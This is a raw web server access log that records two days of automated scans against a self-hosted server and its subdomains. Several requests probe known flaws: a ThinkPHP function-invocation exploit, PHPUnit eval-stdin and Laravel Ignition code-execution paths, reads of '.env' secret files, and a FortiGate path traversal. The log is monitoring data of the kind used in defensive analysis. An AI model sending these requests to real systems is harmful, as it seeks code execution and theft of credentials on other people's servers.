GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:43 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:44 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [03/Nov/2021:01:23:45 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:46 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:46 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:47 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:01:23:48 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:02:31:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.201.154] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:02:37:58 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Nov/2021:02:37:58 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Nov/2021:03:31:14 +0000] 444 - GET https sql.moralanimal.net "/" [Client 107.150.63.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [03/Nov/2021:05:17:12 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:05:19:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:05:22:13 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:06:11:58 +0000] 400 - GET http localhost "/ab2g" [Client 165.227.232.194] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:06:11:58 +0000] 400 - GET http localhost "/ab2h" [Client 165.227.232.194] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:06:27:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [03/Nov/2021:07:34:44 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Nov/2021:08:00:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Nov/2021:08:13:22 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [03/Nov/2021:09:14:36 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.198.114] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:09:33:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.26] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [03/Nov/2021:09:49:45 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:12:26:30 +0000] 400 - GET http localhost "/ab2g" [Client 128.199.26.94] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:12:26:31 +0000] 400 - GET http localhost "/ab2h" [Client 128.199.26.94] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:12:28:55 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:28:55 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:28:55 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:28:57 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:28:58 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:01 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:03 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:03 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:06 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Nov/2021:12:29:08 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:12:29:08 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [03/Nov/2021:13:22:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:15:03:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.196.50] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Nov/2021:16:51:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.42] [Length 0] [Gzip -] "-" "-" [03/Nov/2021:16:51:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.42] [Length 252] [Gzip -] "-" "-" [03/Nov/2021:16:51:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [03/Nov/2021:18:22:46 +0000] 400 - GET http localhost "/ab2g" [Client 159.65.226.72] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:18:22:46 +0000] 400 - GET http localhost "/ab2h" [Client 159.65.226.72] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:19:05:48 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [03/Nov/2021:20:01:06 +0000] 444 - GET https 64.22.31.253 "/OA_HTML/AppsLocalLogin.jsp" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [03/Nov/2021:20:16:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Nov/2021:20:24:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth.owa" [Client 170.130.55.120] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" "-" [03/Nov/2021:20:44:47 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Nov/2021:20:44:47 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Nov/2021:20:44:47 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Nov/2021:20:44:47 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Nov/2021:20:44:47 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Nov/2021:20:44:47 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Nov/2021:21:44:24 +0000] 444 - GET https agent.moralanimal.net "/" [Client 64.225.25.199] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [03/Nov/2021:21:55:56 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Nov/2021:21:55:57 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Nov/2021:22:32:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [03/Nov/2021:23:15:34 +0000] 400 - GET http localhost "/" [Client 103.45.116.11] [Length 154] [Gzip -] "-" "-" [03/Nov/2021:23:59:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [04/Nov/2021:00:19:35 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [04/Nov/2021:00:27:04 +0000] 400 - GET http localhost "/ab2g" [Client 157.245.118.40] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:00:27:04 +0000] 400 - GET http localhost "/ab2h" [Client 157.245.118.40] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:00:28:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Nov/2021:00:30:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Nov/2021:01:07:42 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:01:28:16 +0000] 444 - GET https speedtest.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [04/Nov/2021:01:58:09 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [04/Nov/2021:02:03:04 +0000] 400 - - http localhost "-" [Client 172.105.77.209] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:02:26:53 +0000] 444 - GET https 64.22.31.253 "/sitecore/shell/ClientBin/Reporting/Report.ashx" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [04/Nov/2021:02:31:24 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.202.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:04:23:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [04/Nov/2021:04:36:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Nov/2021:05:16:54 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:05:18:52 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:05:22:01 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:05:45:43 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [04/Nov/2021:05:57:03 +0000] 400 - GET https localhost "/UPlK" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:06:27:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Nov/2021:06:31:53 +0000] 400 - GET http localhost "/ab2g" [Client 137.184.212.91] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:06:31:53 +0000] 400 - GET http localhost "/ab2h" [Client 137.184.212.91] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:07:53:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.251.164] [Length 0] [Gzip -] "-" "-" [04/Nov/2021:09:17:43 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.206.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:10:33:10 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:10:52:43 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 194.127.178.31] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Nov/2021:10:52:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:44 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:47 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [04/Nov/2021:10:52:48 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:52 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:52 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:54 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Nov/2021:10:52:55 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:56 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:56 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:52:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:10:53:02 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:11:11:47 +0000] 444 - GET https router.moralanimal.net "/" [Client 159.203.175.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:14:59 +0000] 444 - GET https io.moralanimal.net "/" [Client 174.138.59.46] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:29:04 +0000] 444 - GET https komga.moralanimal.net "/" [Client 45.55.46.231] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:37:08 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 142.93.176.126] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:39:37 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 134.209.173.70] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:49:00 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 159.203.90.203] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:50:10 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 167.71.184.124] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:53:52 +0000] 444 - GET https sql.moralanimal.net "/" [Client 161.35.178.233] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:11:58:25 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.153.76.25] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [04/Nov/2021:11:59:34 +0000] 444 - GET https home.moralanimal.net "/" [Client 161.35.186.79] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:05:08 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 159.65.246.16] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:18:15 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 165.227.125.6] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:18:16 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 64.225.58.220] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:20:20 +0000] 444 - GET https opds.moralanimal.net "/" [Client 68.183.144.64] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:23:05 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 161.35.179.162] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:24:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Nov/2021:12:26:47 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 159.203.108.10] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [04/Nov/2021:12:55:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Nov/2021:13:19:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.110.69] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [04/Nov/2021:13:19:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.241.23] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [04/Nov/2021:13:20:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.120] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [04/Nov/2021:13:23:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.41] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Nov/2021:13:53:38 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] 